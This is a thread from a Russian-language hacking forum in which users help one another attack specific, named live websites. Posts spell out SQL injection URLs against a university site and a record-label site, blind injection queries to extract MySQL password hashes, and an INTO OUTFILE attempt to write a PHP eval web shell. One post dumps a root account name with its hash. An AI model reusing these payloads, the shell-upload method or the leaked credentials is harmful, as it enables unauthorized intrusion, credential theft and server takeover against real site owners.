|
Ваши вопросы по уязвимостям.
В этой и только в этой теме вы можете задать вопрос про способ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках (для остального есть поиск по форуму). Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы если вы хотите поделиться уязвимостью или нашли что-то новое интересное в публичном двиге и хотите чтобы вам помогли это разобрать. Задавать вопросы ответы на которые с легкостью можно найти в многочисленных мануалах и статьях крайне не рекомендуется |
Расскажите про вот такую штуку.
http://webapps.jhu.edu/needs/detail.cfm?id=1805'+or+1=(SELECT+TOP+1+TABLE_NAME+ FROM+INFORMATION_SCHEMA.TABLES) Я вначале подумал что это MSSQL (потому и писал в запросе INFORMATION_SCHEMA.TABLES), а потом посмотрел вроде и не мс, а макромедиа. Короче не понятно мне. Плюс к тому странный выдает ответ - не найду такого-то файла, отсюда вывод что можно грузить файлы баз данных если знаешь имя файла. Но там дописывается расширение автоматом, в связи с этим пробовал %00 - не получилось. Вообщем не все мне ясно с этой базой. Может кто видел такое - поделитесь. |
Это ColdFusion
права у твоей небольшие - нет прав на системные таблицы. это видим из http://webapps.jhu.edu/needs/detail.cfm?id=1805+union+select+1,2,3,4,5,6,name,8 ,9,10,11,12,13+from+MSysObjects подбирай кол-во столбцов http://webapps.jhu.edu/needs/detail.cfm?id=1805+and+1=0+union+select+1,2 ... Загвоздка в том что запрос не выполнится пока одновременно не будет подобрано точное кол-во + подставлено в одно из полей правильное название одного из столцов (иначе база считает запрос пустым) либо же при наличие прав у юзера (а они часто оставляются по дефолту) выполнять любые запросы в кф базе http://webapps.jhu.edu/needs/detail.cfm?id=1805;запрос |
brute/shell
приветствую!
столкнулся с такой проблемой ( http://server.com/index.php?id=1 or 1=if(ascii(substring((select%20password%20from%20m ysql.user%20where%20user=char(114,111,111,116)),1, 1))>=100,1,0)/* Error Number: 1242 Error Message: Subquery returns more than 1 row а в случае 1=if(ascii(substring((select user()),1,1))>=100,1,0) все работает нормально, возвращается ответ либо 1 либо 0..... то есть можно перебрать ) права есть! пасс выглядит так.... 3553f4a3048036eb я просто не в курю почему перебирать не дает... ------------------------------------------------------------------ и вторая проблема..... не могу залить шелл, хотя файл привелегии есть..... лоад_файл работает..... http://server.com/index.php?id=1 union select 1,<?php eval($_GET[http://server.com/cmd.php]) ?>,3,4,5,6,7,8 into outfile 1.txt/* You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ',3,4,5,6,7,8 into outfile 1.txt/*' at line 2 если <?php eval($_GET[http://server.com/cmd.php]) ?> расписать все через char то начинает ругаться на 1.txt.... Error Number: 1064 Error Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1.txt/* AND n.status != 'Disabled' ORDER BY date DESC ' at line 2 уже и так писал и сяк, не получается с этим серваком ((( версия 5.0.22 с уважением, |
Цитата:
юзай лимит хотя странно, почему при where выдается не одна строка... попробуй тупо лимит 0,1 , как правило, рут - первый юзер. по поводу второго: <?php eval($_GET[http://server.com/cmd.php]) ?> это должно быть в кавычках |
Цитата:
Т.е. вы посто забыли поставить кавычки за прописать полный путь. |
спасибо за советы,
1. не смог проверить сервак в дауне 8*(**** я понял в чем суть ошибки, просто меня самого смутило что возвращается какой то не однозначный ответ и не 1 и не 0 - поэтому и спрашиваю что за муть.... 2. кавычки фильтруются жестко, по формату знаю.... писал через чар, но не выходит.... ругается ошибкой 1062 кажется..... писал что синтаксическая ' без пути - без ничего..... www.server.com/index.php?id=1 union select 1,char(),3,4,5,6,7,8 into outfile или же from table into outfile полный путь или же просто для теста тупо 1.txt/* пробовал по всякому, может реально не судьба) поэтому и оставался вариант брута, хз подскажите как правильно запрос написать с лимитом.... where user= ? благодарю.... |
Цитата:
|
Цитата:
Вот это ты имел ввиду? Цитата:
|
там как не странно но два пользователя с 2-мя одинаковыми пассами....
limit помог, пасс соответственно как я и писал выше.... root:3553f4a3048036eb touchandgo:3553f4a3048036eb http://www.touchandgorecords.com/bands/band.php?id=70%20union%20select%201,concat(USER(), char(58),VERSION(),char(58),DATABASE()),3,4,5,6,7, 8/-- ------ именно ' там фильтруются, у меня не получилось шелл залить( благодарю за помощь, отдельное спасибо I-I()/Ib - за статью..... ) |
| Время: 22:25 |